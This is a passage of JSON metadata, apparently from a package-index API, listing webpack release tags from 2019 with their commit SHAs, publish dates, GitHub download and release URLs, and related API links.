:"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-1